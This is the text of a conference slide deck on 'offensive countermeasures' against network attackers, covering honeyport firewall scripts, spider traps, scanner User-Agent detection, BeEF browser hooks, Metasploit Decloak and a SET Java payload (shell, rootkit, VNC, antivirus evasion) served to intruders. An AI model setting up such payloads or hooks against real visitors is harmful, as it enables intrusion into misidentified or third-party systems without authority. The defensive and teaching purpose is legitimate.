paul asadoorian - bringing sexy back

Post on 25-Dec-2014


Bringing Sexy Back: Defensive Measures That Actually Work

Paul Asadoorian (paul@pauldotcom.com)

John Strand (john@pauldotcom.com) http://pauldotcom.com

Paul Asadoorian


http://pauldotcom.com

Goal: Bring Sexy Back

Outline

• # whoami
• Introduction - OODA, Don’t run away
• Case Studies - Reasons why we CAN do this
• Warning banners - Allows you to do things you disclose
• Annoyance - Mr. Clippy, User Agent, Spider Traps
• Attribution - BeEF, Metasploit Decloak
• Attack - SET, Java payloads, purple ASCII art

Introduction

Yes, I said “Hacking Back” but don’t run away

Disclaimer

The contents of this presentation may get you into trouble. In fact, conventional wisdom stipulates that everything we are going to discuss is a “bad idea.” Make sure you vet any tactics in this presentation by your legal team and upper management first.

Any action you take from this presentation should be documented in writing before implementing.

First off, why are we talking about “hacking back”?

Successful Penetration Tests

• Most organizations provide easy access to their “intellectual property”
  • How many pen tests have you been on?
  • How many of those were successful?
• Or?
  • How many women have you dated?
  • How many have you slept with?

Why Are Penetration Tests Always So Successful?

1. Flimsy Defensive “Layers”

2. Social Engineering

Because there is no patch for human stupidity...

3. Passwords

4. Software Vulnerabilities

John & Paul Then Thought

• We can do better
• What if we were to defend systems, applying what we know about attacks?
• For so long we’ve gone down the beaten path that we call “security”
• It’s time to break the mold

We also thought about how messy we get when eating noodles, but someone beat us to the solution...

Why Use Offensive Counter Measures?

• There are times where you will be required to do “more”
  • In particular when working with law enforcement
• The attackers are getting more and more brazen
  • Very little perceived risk on their part
• We have rules, they don’t follow rules
• You may need to figure out what an attacker is after or gather information about them
  • e.g. If they are attacking from a bot-net or through TOR

OODA

• Whoever can do these things the fastest lives:
  • Observe
  • Orient
  • Decide
  • Act
• Originally developed for fighter pilots
• With current security models how many can you impact?
• Works both ways, Dis-Orient attackers!

John Boyd

Paul, “fighting”

Case Studies

Stuff other people did that makes what we’re going to do look okay

Case Study: Consent to University Network Terms

• Sysadmin hacks into threatening machine
  • Gathered evidence used against student using temp/temp creds
• Student’s consent to university terms justifies sysadmin
• U.S. v. Heckenkamp
• Kevin Poulsen, “Court Okays Counter-Hack of eBay Hacker's Computer,” Threat Level, April 6, 2007
  • http://blog.wired.com/27bstroke6/2007/04/court_okays_cou.html

“A federal appeals court just shot down an attempt by confessed superhacker Jerome Heckenkamp to overturn his computer crime convictions, which were an end result of information provided by a university sysadmin who broke into Heckenkamp’s computer to gather evidence.”

Case Study: Public Example of Reflected Attack

• 1999 - World Trade Organization website
• DOS attack from E-Hippies Coalition
• Hosting service Conxion reflected the attack back to E-Hippies and disabled its website
• Conxion not prosecuted
  • http://www.networkworld.com/research/2000/0529feat2.html

"So we told our filtering software to redirect any packets coming from these machines back at the e-hippies Web server"

Case Study: MSFT Court Order – Botnet

• Civil lawsuit 2010
• Court issues order to suspend the domains associated with the Waledac botnet
• MSFT takes “other technical measures” to degrade the botnet
  • www.google.com/buzz/benwright214/PcJTmLbEwit/Cyber-Defense-Law-Botnet-Computer-Crime-Lawsuit

“Notice that Microsoft is not doing this in the dark. It is working through our open public court system, so that Microsoft is transparent and accountable and all can see what is happening and evaluate it.”

Case Study: DOJ Takes Over 2 Million Node Botnet

• A judge gave permission to FBI and U.S. Marshals to set up servers to stop the Coreflood botnet
• They were also given permission “to send commands to infected computers that stops the Coreflood virus”
• They seized 5 servers and 29 domain names
• DOJ now owns 2.5 million computers on the Internet, and will essentially tell the malware to self-destruct
• What, this isn’t sexy enough for you?

Let’s Pretend I’m a Lawyer

• I’m advising you to:
  • Discuss
  • Document
  • Plan
• Consult with others, reveal your plans!
• Hiding intentions means you think what you are doing is “wrong”
• Rule of thumb: Don’t be evil
  • While it can seem like a lot of fun, it can get you in big trouble

Note: We love the EFF (eff.org go donate!)

Okay, Let’s Stop Pretending

• Could this get you into trouble?
  • Possibly. There is still some debate on how to do it properly
• There are a few things we can avoid to keep us from getting in trouble
  • Don’t ever put malware where it is publicly accessible
  • Don’t make it too easy to get to
  • Use Warning Banners...

Warning Banners

Warning, we are going to talk about warning banners...

Look at Your Warning Banner

• There is a lot in there about permission
• There are a number of technologies that will “check” your system before it accesses the network
  • OpenVPN scripts (Like a NAC Check)
  • Windows 2008 Network Access Protection
• Is it possible to use this as a means to gather some information about an attacker system?
• Put in your warning banner that you can do what you want!

Example: Eric Needed a Warning Banner

• What does a kitchen knife, a crutch, and duct tape have to do with anything?
• It is illegal to set up lethal traps for trespassers
• However, if you tell them there may be evil things on your network/property you warned them

"super went to open the door, felt resistance and found the rigged contraption" -- a big knife duct-taped to a crutch, which was installed with an elastic cord. The super was not injured.

Eric Stetz was arrested and charged with reckless endangerment for a vicious-looking booby trap.

http://gothamist.com/2008/04/06/homemade_booby.php

WARNING: There is a knife duct taped to a crutch attached to an elastic band. Enter at your own risk!

Would this have kept Eric Stetz out of trouble?

FREE VASECTOMY

This likely would not have kept Eric Stetz out of trouble...

Reality Check: Don’t Be Stupid (like Eric)

• How could this go wrong for you?
  • Dumb moves (like knife crutches)
  • Easily accessible malware (e.g. traps)
  • Full attacks of attacker IP addresses
  • Purposely damaging systems
  • Persistent long-term access to bad guys
• We have smarter options to work with
  1. Annoyance
  2. Attribution
  3. Attack

Annoyance

Stressing out the attackers...

Annoyance: HoneyPorts

• Forces attackers to make a full connection to avoid spoofing pitfalls
• Attackers and testers hate this……..

@echo off
rem Block the remote address of any connection that netstat shows on local port 3333
for /L %%i in (1,1,1) do @for /f "tokens=3" %%j in ('netstat -nao ^| find ^":3333^"') do @for /f "tokens=1 delims=:" %%k in ("%%j") do netsh advfirewall firewall add rule name="WTF" dir=in remoteip=%%k localport=any protocol=TCP action=block

If a machine makes a full TCP connection to port 3333, a firewall rule is added to block the source IP address

Annoyance: HoneyPorts

• Works on Linux too of course, same concept
• Must have working copy of Netcat on your system
• Should be modified to log entries and report back to enterprise SIEM

[root@linux ~]# while [ 1 ] ; echo "started" ; do IP=`nc -v -l -p 2222 2>&1 1> /dev/null | grep from | cut -d[ -f 3 | cut -d] -f 1`; iptables -A INPUT -p tcp -s ${IP} -j DROP ; done
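The slide's point that a honeyport should log entries and report to the SIEM, as an added example (not the presenters' code): a Python listener that turns each completed TCP handshake into one JSON event and builds the same iptables rule as the one-liner above. The class name, event field names, allowlist and the log-only default (`enforce=False`) are assumptions.

```python
import json
import socket
import subprocess
import time


def block_command(ip):
    """The rule the slide's Linux one-liner adds, as an argv list (no shell)."""
    return ["iptables", "-A", "INPUT", "-p", "tcp", "-s", ip, "-j", "DROP"]


class HoneyPort:
    def __init__(self, host="0.0.0.0", port=2222, allowlist=(), enforce=False):
        self.allowlist = set(allowlist)  # assumption: your own scanners and monitors
        self.enforce = enforce           # False = log only, never touch the firewall
        self.blocked = set()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(16)
        self.port = self.sock.getsockname()[1]

    def handle_one(self):
        """Wait for one completed TCP handshake and return the event as a dict."""
        # accept() only returns after the three-way handshake, so the source
        # address cannot be a blind spoof of an address you care about.
        conn, (ip, sport) = self.sock.accept()
        conn.close()
        if ip in self.allowlist:
            action = "allowlisted"
        elif ip in self.blocked:
            action = "already-blocked"   # avoids appending duplicate rules
        else:
            action = "block"
            self.blocked.add(ip)
            if self.enforce:
                subprocess.run(block_command(ip), check=False)
        return {
            "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
            "sensor": "honeyport",
            "dst_port": self.port,
            "src_ip": ip,
            "src_port": sport,
            "action": action,
        }

    def close(self):
        self.sock.close()


def to_siem_line(event):
    """One JSON object per line, ready for a log shipper to forward."""
    return json.dumps(event, sort_keys=True)


if __name__ == "__main__":
    hp = HoneyPort(port=2222, allowlist={"127.0.0.1"})
    while True:
        print(to_siem_line(hp.handle_one()), flush=True)
```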


Annoyance: Mr. Clippy

• Through PHPIDS we can make attacking a website “interesting”
• First, install PHPIDS
• PHPIDS has clipping thresholds
• Then create a rule for all attackers to pull up Mr. Clippy

Annoyance: Making Your Website Look Like Something Else

Oh, you’re IIS, here are all my IIS attacks!

Annoyance: Filter User-Agent Strings

• Filter the User-Agents in use by attackers and testers:
  • Nikto, Acunetix, “I am Hacking You”
• Sites do not lock down the mobile version of website
  • There has been a lot of research in this area by Chris John Riley
  • E.g. Using the iPhone User-Agent reveals mobile version of site
  • Some people don’t secure the mobile version
• What if you present traps or DoS conditions based on User-Agent?

<?php
// Robots honeypot page: mails an alert with the visitor's IP address and User-Agent.
$ip = getenv('REMOTE_ADDR');
$useragent = getenv('HTTP_USER_AGENT');

$to = "yournonproductionemail@example.com";
$subject = "Robots honeypot from " . $ip;
$body = "User at " . $ip . " tripped robots honeypot.\nUser-Agent was: " . $useragent;

mail($to, $subject, $body);

echo("<html><h1>Congratulations, you found the secret page. Now email " . $to . " to avoid being blacklisted.</h1></html>");

// The User-Agent is client-controlled, so HTML-escape values before echoing them back.
echo("Your IP address is: " . htmlspecialchars((string) $ip) . "\n");
echo("Your User Agent is: " . htmlspecialchars((string) $useragent) . "\n");
?>

Annoyance: Messing with Attackers’ Heads

Credit Josh Wright: http://mail.pauldotcom.com/pipermail/pauldotcom/2009-February/000713.html

Annoyance: Messing with Attackers’ Heads

This all happened in the same day!

Fun part is we get to make things up as to why this happened...

Annoyance: Evil Web Servers

• Many testers and attackers use automated crawling
  • This helps identify pages and possible insertion points for their attacks
  • If they say they don’t, they are probably lying
• *Maybe* there is a way to attack the tools
  • Setting up a DoS condition for their automated scanner
• Note: This is not something you want to try on an external web server that you want to have crawled by Google
  • Configure robots.txt to point to resources you control
  • NOT something you put in your index.php page!

Exploiting Existing Vulnerabilities

• Acunetix DoS in Sniffer Component
  • http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=23507
• Webinspect Crashes Loading Reports
  • http://seclists.org/educause/2009/q3/526 “We can run the scans but if you select a report that has critical vulnerabilities in it the report generator crashes with invalid characters.”
• AppScan Vulnerabilities
  • SSL: https://www-304.ibm.com/support/docview.wss?uid=swg1PM24290
  • Login Recording: https://www-304.ibm.com/support/docview.wss?uid=swg1PM04998

Evil Annoyance: Fuzzing Attacker Tools

• Why not browse the attackers/testers tools?
• There are a number of different browser fuzzers available
  • Bf3, Sully, Python
• We can also use DOM-Hanoi
  • Geared towards browser fuzzing, but hey. It works
  • Actually, it just takes a long time to run
• Goal: Build a page that consistently crashes the attackers tool!

Annoyance: Setting Traps

SpiderTrap & WebLabyrinth

• Spidertrap: Small Python script to trap web spiders
• Ben Jackson created a PHP version called WebLabyrinth
• It is PHP so you can load it in your web infrastructure
• Has a number of cool features
  • Gently tells Googlebot to go away
  • Random HTTP codes
  • *NEW* Database Support
  • *NEW* Alerting with IDS-style rules
• David Bowie Approved

Prevention: Nessus Example

Keeping it “Real”

Wget: Falling Into The Trap

Now for W3AF

This is Going to Take a While...

Also annoying

Helps the Internet Be a Better Place?

[17/Mar/2011:21:32:03 +0000] [209.20.92.14/sid#19367c8][rid#26616d8/initial] (1) redirect to http://securityfail.com/labyrinth/ [REDIRECT/302]

209.190.23.66 - - [17/Mar/2011:21:32:03 +0000] "GET //admin/ HTTP/1.1" 302 192 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"

The IP Address 209.20.92.14 wandered into the labyrinth:

“/admin” on my server redirects people or bots to the labyrinth:

Interesting User Agent, eh?

• Turns out “ZmEu” is a popular string for the user agent to contain for bots looking for insecure web applications
• If the automated bots waste time in my labyrinth, that’s less time they spend attacking other sites
• It’s also less time they spend on my own site trying lame attacks, that likely would not work anyway
• My “traps” should also spring on some of the following requests as well:

[client 209.190.23.66] File does not exist: /var/lib/mediawiki/phpmyadmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/phpMyAdmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/dbadmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/myadmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/MyAdmin

Helps the Internet Be a Better Place?

Laughing at me or laughing at them?

• Nice to see attackers are smiling at me, or not
• Multiple attempts from different IPs across multiple servers
• About “anti-sec”:

[client 68.178.200.178] File does not exist: /var/lib/mediawiki/w00tw00t.at.blackhats.romanian.anti-sec:)
65.18.168.136 - - [04/Mar/2011:19:53:13 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
72.167.165.90 - - [21/Feb/2011:10:56:01 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
89.108.119.29 - - [06/Feb/2011:02:01:52 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"

The Anti Security Movement (also written as antisec and anti-sec or antii-sec) is a popular[citation needed] movement opposed to the computer security industry. It attempts to censor the publication of information relating to but not limited to: software vulnerabilities, exploits, exploitation techniques, hacking tools, attacking public outlets and distribution points of that information.
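Detection logic for the requests shown on these slides, as an added example that is not from the presentation: it parses Apache combined-format access lines and flags clients by the scanner User-Agent markers (ZmEu, Nikto, Acunetix) and probe paths the slides name. The first two sample lines are copied from the slides; the 192.0.2.x lines, the function names and the reason labels are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# User-Agent markers named on the slides, compared in lower case.
SCANNER_UA = ("zmeu", "nikto", "acunetix")
# Paths from the slides' error log plus the /admin decoy; one or more leading slashes.
PROBE_PATH = re.compile(r"^/+(phpmyadmin|dbadmin|myadmin|admin|w00tw00t)\b", re.I)

SAMPLE_LOG = """\
209.190.23.66 - - [17/Mar/2011:21:32:03 +0000] "GET //admin/ HTTP/1.1" 302 192 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
65.18.168.136 - - [04/Mar/2011:19:53:13 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
192.0.2.10 - - [04/Mar/2011:20:01:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [04/Mar/2011:20:02:00 +0000] "GET /phpMyAdmin/ HTTP/1.1" 404 239 "-" "Mozilla/5.0"
this line is not a valid log entry
"""


def classify(line):
    """Return a dict for a parsable line (reasons may be empty), else None."""
    m = COMBINED.match(line.strip())
    if not m:
        return None
    reasons = []
    ua = m["ua"].lower()
    marker = next((s for s in SCANNER_UA if s in ua), None)
    if marker:
        reasons.append(f"scanner-ua:{marker}")
    probe = PROBE_PATH.match(m["path"])
    if probe:
        reasons.append(f"probe-path:{probe.group(1).lower()}")
    return {"ip": m["ip"], "path": m["path"],
            "status": int(m["status"]), "reasons": reasons}


def triage(log_text):
    """Group reasons per client IP; also count lines that failed to parse."""
    flagged, skipped = defaultdict(set), 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = classify(line)
        if event is None:
            skipped += 1          # unparsable lines are counted, not silently dropped
        elif event["reasons"]:
            flagged[event["ip"]].update(event["reasons"])
    return {ip: sorted(r) for ip, r in flagged.items()}, skipped


if __name__ == "__main__":
    hits, bad = triage(SAMPLE_LOG)
    for ip, reasons in hits.items():
        print(ip, ",".join(reasons))
    print("unparsed lines:", bad)
```

A client flagged only by path (the 192.0.2.44 line) shows why the User-Agent filter alone is not enough: the marker string is client-controlled and trivially changed.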

Attribution

I can still see you...

Protecting Your Intellectual Property

• “Callbacks” - Similar to Software updates
• Sends information back to home base about system
  • IP address, hardware and software configurations
  • Microsoft Genuine Advantage, crash dumps
• Tracking software in phones
  • Just look at Android... Does “checkers” really need access to my contact list and call history?
• We are not necessarily talking about “hacking” per se
• We are talking about getting attribution

Send my information to Microsoft?

Word Web-Bugs

• Feature built into exploit frameworks for penetration testing
• This tactic works great at tracking intellectual property
• Not all ways of attribution need result in shell access
• Far less likely to crash a system
• Embed this code in a spreadsheet called SSN.xls and watch how fast an attacker runs the macros
• Call back should go to a closely monitored system

This is like Spy Stuff, like James Bond...

“Ohhhhhh James...” See, Defense IS Sexy! Eh?

How does it work?

• It simply inserts a reference to a css running on the system, in this case, running Core IMPACT
• When the doc is opened it tries to open the URL
• Direct connection!

Web Application Streetfighting

• How can we use JavaScript against the attackers?
• BeEF (Browser Exploitation Framework)
  • Harvest information
  • Send direct links
  • Possibly exploit their systems (XMLRPC)
• Maybe we could just mess with them
  • Send indications of XSS and SQLi in every response to their attacks
• We need to have a wide variety of tools and techniques

• Lead the attacker to decoy site that no legit user would visit
• Example: robots.txt:
• Example: admin.php displays a bogus login page
• Hidden in admin.php is “The Hook”:
  • <script language='Javascript' src='http://<yourserver>/beef/hook/beefmagic.js.php'></script>

BeEF: Get the attacker to connect

User-agent: *
Disallow: /admin/admin.php

I like ninja grappling hooks....

Hooked on BeEF: Now what?

• Capabilities are broad
  • Gather info
  • Browser type and version, OS type and version, screen resolution, etc.
• Simple popup:

Attackers use IIS 6.0? No Way!

BeEF Modules

• The issue is deciding how far to go
• Do you cross the line between info gathering and attacking the attacker(s) system?
• You can do that with BeEF, not saying that you should, but you can if you have permission
• Cross the line: Many built-in modules
  • Metasploit integration: Browser Autopwn, SMB Challenge Theft, etc.
• DoS may be okay, and this seems like a good place to build a DoS for your favorite, or not so favorite, hacking tool
• Example: Find an exploit for Nikto and put it into BeEF

BeEF Modules (2)

Who else have they hacked?

Who are they really? How are they hiding?

Send them to your competition

Attribution: Decloak

• From the Metasploit project
  • More information http://decloak.net/
• Great place to redirect users from robots.txt
• Many attackers and penetration testers will use proxies and/or Tor to hide their IP address
• Decloak can reveal the real IP address of the scanner

“This tool demonstrates a system for identifying the real IP address of a web user, regardless of proxy settings, using a combination of client-side technologies and custom services.”

Looking at the Components of Decloak

Now, for Java

The DNS Server

Compile and Start

Now, Surf to Your Linux System

Checking the Database

Viewing the Data

Wireless Countermeasure Example

• Step 1: Set up a hidden SSID (“private” or “guest”)
• Step 2: Use a captive portal when people connect to it
• Step 3: Portal login page contains BeEF hook or SET exploit (use your warning banner!)
• Step 4: Collect information about attacker (dissolvable agents)
• Step 5: (OPTIONAL) Ban Wifi Mac on WIPS and/or Wireless network (works until they change it)

Gotchas

• Make sure SSID has access to nothing or just more honeypots
• Tough one: Prevent real users from connecting to it
• Tougher one: Make attackers think it’s a real SSID & network
• Danger: Make sure your BeEF server is not a jumping off point

Pwning yourself is not fun

Wireless: More Thoughts

• Send wireless driver exploits on the network, triggered by some event
  • Easily will backfire...
• Answer to clients probing for non-production networks, send them to a page that tells them they are mis-configured (beat the attackers to it)
  • May really piss off users
• Bluetooth Canary - Leave Bluetooth phone with OBEX enabled
  • Have address book with numbers that all route to you

Attack

Gopher is an old protocol too...

Attack: Java Payload

• If we can get an attacker to load a Java payload, why not give them something interesting, like a Metasploit payload?
• Java payloads are awesome for penetration testers, no vulnerabilities required!
• They can also be useful for attackers...

Just for @beaker and @attrition

Evil Java Application

• Embed a malicious Java Application in a non-production web server
  • Usually in a directory that is noindex and/or nofollow in robots.txt
• The attacker/victim will get a pop-up asking if they want to open the Java application
• They will, attackers tend to be very curious
• The payload can be flexible (Shell, Rootkit, VNC)
• You can automatically run enumeration scripts when the attacker/victim runs the application

Browsing to Your Site

Everyone Clicks “Run”

http://[Your Linux IP]

Configuring SET

Dave Kennedy, the author of SET, loves purple.

Website Attacks are Key

Using Java... Glorious Java

Default Templates

Choosing your Payload

Encoding to Dodge AV

You Say YES!!

Have Your Backtrack System Surf to SET

Not Pretty.. But it Works

Precautions and Usage

• Put this on the inside of the network
• Careful an attacker doesn’t redirect your users
• Make sure no one can take over your Metasploit instance
• Don’t have to do anything with the shell
  • You can autorun certain non-damaging commands
  • ping your system

Listen

- http://pauldotcom.com/radio (24/7)

- Podcast in iTunes (audio/video)

Watch

- Live! http://pauldotcom.com/live

- “TV” http://pauldotcom.blip.tv

Participate

- Mailing List: http://mail.pauldotcom.com

- Community: http://pauldotcom.com/insider

- IRC: irc.freenode.net #pauldotcom

Read

- http://pauldotcom.com (Blog)

- Email us psw@pauldotcom.com

Want More? (Shameless Plug)

OFFENSIVE COUNTERMEASURES: DEFENSIVE TACTICS THAT ACTUALLY WORK

Black Hat Las Vegas 2011

Register Today!

The End

Wake up, time for Questions?
